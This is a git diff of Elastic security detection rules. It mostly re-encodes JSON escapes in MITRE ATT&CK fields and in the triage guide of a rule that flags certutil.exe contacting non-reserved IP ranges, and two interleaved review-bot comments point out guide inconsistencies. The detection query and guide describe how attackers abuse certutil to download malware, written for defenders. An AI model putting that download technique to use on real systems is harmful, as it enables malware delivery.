diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json
index b64518d3c05..cdf4db13a6c 100644
--- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_102.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json
index ee503b1c601..c88a28eacb9 100644
--- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_103.json
@@ -48,7 +48,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json
index 8b2d5f3a68b..4dc0a7914f0 100644
--- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_104.json
@@ -48,7 +48,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json
index a548528bd42..b53545fa077 100644
--- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_105.json
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json
index be186cc328e..7e41c3411cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_106.json
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json
index 81b433bf6b6..d8dad2463c4 100644
--- a/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/3805c3dc-f82c-4f8d-891e-63c24d3102b0_207.json
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json
index 854acfcb4c7..d8cbb34a24a 100644
--- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_104.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Network Connection via Certutil",
- "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json
index aa1743756df..11ce3dff3e6 100644
--- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json
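Review bot: The unchanged part of the `note` line in this `_104` snapshot still contains the unexpanded `$osquery_0` to `$osquery_3` placeholders, while the `_105` snapshot that follows carries them expanded into `!{osquery{...}}` directives; if the `_104` file is still installable, Kibana will render the literal `$osquery_N` text in the investigation guide. The hunk itself only turns `\u003e` into `>` inside the JSON string, so the parsed rule content is identical and no version suffix changes, which is consistent with every other `MITRE ATT\u0026CK` hunk in this diff being escape-only; a CI assertion that the parsed JSON of each touched file is unchanged would make that property explicit rather than relying on eyeballing. Whether historical versioned snapshots are intentionally frozen is not visible here; if they are, a one-line note to that effect in the package documentation would save the next reviewer the same question.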
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json index 1ae05fcb4a3..0ac6b2b912d 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json 
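Review bot: The new `note` string in this hunk still closes its account-investigation bullet with `to the target host after the registry modification`, which does not fit a rule that triggers on `certutil.exe` network connections and reads like a carry-over from a registry-persistence guide; `to the target host after the certutil network connection` would match what the query actually detects. The same sentence appears in the `note` of the 106 and 107 file sections and in the 108 section that begins at the end of this chunk, so if these versioned copies are regenerated from a rule source the fix belongs there, applied once. The guide also says the rule looks at ranges other than those in the IANA IPv4 special-purpose registry, while the query additionally excludes `::1`, `FE80::/10` and `FF00::/8`; a short mention of the IPv6 loopback, link-local and multicast exclusions would keep the text consistent with the logic. The `\u0026` and `\u003e` to `&` and `>` re-encoding itself is value-preserving for any JSON consumer and changes only the on-disk form.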
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
